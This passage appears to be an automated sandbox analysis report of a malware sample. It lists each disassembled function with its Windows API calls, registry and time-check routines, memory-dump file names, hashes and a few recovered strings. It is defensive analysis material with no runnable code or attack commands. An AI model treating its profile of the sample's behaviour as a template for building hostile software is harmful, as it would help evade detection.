                              • Instruction ID: 8a2d23c43be455bfaa2dc35afaa3f961cc926c0435daed52f03747e93a02e437
                              • Opcode Fuzzy Hash: 6a484ef14bb2bd7790fe1bfc6c178d4698c15f15a459ec213a1e2e006b22a620
                              • Instruction Fuzzy Hash: 1881E871E043059BDB14DF94DC84BAEB7B5EF94300F1480AAE909A7382EB399D47CB94
                              Function 007C7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C7F31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C7F60
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C7FA5
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C7FD3
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C8007
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: fa8fde24852b9d6a19b4a860561ff2300aadc85b3ac3f5fedd16531a8e9b1c98
                              • Instruction ID: 3ab93a2456689faed82fb5156e2643e7bccdfbf54a324c52e5f019ad4ea561c8
                              • Opcode Fuzzy Hash: fa8fde24852b9d6a19b4a860561ff2300aadc85b3ac3f5fedd16531a8e9b1c98
                              • Instruction Fuzzy Hash: 56418B7050811ADFCB20DF69D8C4EAEB7B4FF54300B11819DE805AB251DB78AA66CF91
                              Function 007C8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C80BB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C80EA
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C8102
                              • lstrlen.KERNEL32(00000000), ref: 007C8140
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C816F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: c377cd7aaa247e5024bea54cba622852845caf880b4f34b2886457754d7dfbd8
                              • Instruction ID: d866b261949024678e5add6bbcb745397e614299399fc5d26cdcacbffe547ba8
                              • Opcode Fuzzy Hash: c377cd7aaa247e5024bea54cba622852845caf880b4f34b2886457754d7dfbd8
                              • Instruction Fuzzy Hash: D1418C7160010AEBCB61DF68D988FAABBF4EF44300F15855CA849D7245EF38DD46CB91
                              Function 007D1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 007D1B72
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D184F
                                • Part of subcall function 007D1820: lstrlen.KERNEL32(01445B90), ref: 007D1860
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D1887
                                • Part of subcall function 007D1820: lstrcat.KERNEL32(00000000,00000000), ref: 007D1892
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D18C1
                                • Part of subcall function 007D1820: lstrlen.KERNEL32(007E4FA0), ref: 007D18D3
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D18F4
                                • Part of subcall function 007D1820: lstrcat.KERNEL32(00000000,007E4FA0), ref: 007D1900
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D192F
                              • sscanf.NTDLL ref: 007D1B9A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1BB6
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1BC6
                              • ExitProcess.KERNEL32 ref: 007D1BE3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: 42cfc4194dfd1358e0eecd7865da8b42775620b03954c24d63d4be199121327b
                              • Instruction ID: 41f144edb6331c9f1680f634d6b1f78dc072188315216351090ca87a36483363
                              • Opcode Fuzzy Hash: 42cfc4194dfd1358e0eecd7865da8b42775620b03954c24d63d4be199121327b
                              • Instruction Fuzzy Hash: 7D21F5B1518341AF8350DF65D88496FBBF9FFC8215F808A1EF599C7220E734D9058BA2
                              Function 007D3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D3166
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D316D
                              • RegOpenKeyExA.ADVAPI32(80000002,0144B818,00000000,00020119,?), ref: 007D318C
                              • RegQueryValueExA.ADVAPI32(?,0145D2E0,00000000,00000000,00000000,000000FF), ref: 007D31A7
                              • RegCloseKey.ADVAPI32(?), ref: 007D31B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 37fce6b82cd49e9c1b3f65411d99902629e5ccf3c160fba496e95bca3d9fd2a8
                              • Instruction ID: 380d6b417db6f8b94668f8abbc922ee58ba964758364d6ca440dd6b375e6eb49
                              • Opcode Fuzzy Hash: 37fce6b82cd49e9c1b3f65411d99902629e5ccf3c160fba496e95bca3d9fd2a8
                              • Instruction Fuzzy Hash: F7116076A04245AFD710CB94EC85FABB7BCF748711F10422AFA0997780DB755D0087A1
                              Function 007B8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B8996
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1D5
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B89CD
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: 7da4a49af50f6b2b1e8dbf1901eb2b316f1f06a59c87ae3e03a34a1fddd37c58
                              • Instruction ID: 4192271f2f757ce50676f48366e6f730dabe0a79bd701394d3758864e839e92c
                              • Opcode Fuzzy Hash: 7da4a49af50f6b2b1e8dbf1901eb2b316f1f06a59c87ae3e03a34a1fddd37c58
                              • Instruction Fuzzy Hash: 3D21E7723002509BCB60DA6CE840BAAF7ADDBA1761B15093FF151CB281DA79EC41C3A7
                              Function 007B8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B8883
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 22a427d7fe272d45f2828974e307349803aad1c0f7d377a6036d6a4d8312b2ae
                              • Instruction ID: 95c4e832a703af6caf502b917ec2f78fbd6a2481fd90bd0b15b78ab16ac0ed99
                              • Opcode Fuzzy Hash: 22a427d7fe272d45f2828974e307349803aad1c0f7d377a6036d6a4d8312b2ae
                              • Instruction Fuzzy Hash: 183197B5E005159FCB08DF58C8917AEBBB6EB88350F188269E9159B345DB34AD01CB91
                              Function 007D5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5922
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5935
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: 7d7d71634c4323abf976b6dcd93de2d9aaf45b386d6154873a825b35a36421ee
                              • Instruction ID: 5b59b480e327e7bd309956c84257b4f4d6daac3e788831072b2e4dacd11ad983
                              • Opcode Fuzzy Hash: 7d7d71634c4323abf976b6dcd93de2d9aaf45b386d6154873a825b35a36421ee
                              • Instruction Fuzzy Hash: 45113C31304B40CBD7218B2CE810B1AB7F5AB95761F250A9BE0D187796DBB9E841C7A5
                              Function 007D3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,007DA430,000000FF), ref: 007D3D20
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D3D27
                              • wsprintfA.USER32 ref: 007D3D37
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f475ba2b246370ae9966951b9f4a734a703982fa78f6018f3bc1b3c5ef37131e
                              • Instruction ID: c6ab4f5835b7ed52e43f73207ab67a62a6a8ff5adce4d163919162e2f403df50
                              • Opcode Fuzzy Hash: f475ba2b246370ae9966951b9f4a734a703982fa78f6018f3bc1b3c5ef37131e
                              • Instruction Fuzzy Hash: 8801D2B1648384BFE7209B94DC8AF6ABB7CFB46B62F400115FA059B3D0D7B41D00CAA1
                              Function 007B8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B8737
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 7cf2b761aa091fbb3cabc82f2968cab631137bbf0cc445e536208bcac9c68fcd
                              • Instruction ID: b4a02593a50a2f07cfde182bc79406e9bb284d8ccb208c231fd16c61c4a73385
                              • Opcode Fuzzy Hash: 7cf2b761aa091fbb3cabc82f2968cab631137bbf0cc445e536208bcac9c68fcd
                              • Instruction Fuzzy Hash: 52F02437F000224F8394647E8C881DEA84B56E439433AC725E80AEF359EC38EC82C1D2
                              Function 007D86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007D781C: __mtinitlocknum.LIBCMT ref: 007D7832
                                • Part of subcall function 007D781C: __amsg_exit.LIBCMT ref: 007D783E
                              • ___addlocaleref.LIBCMT ref: 007D8756
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
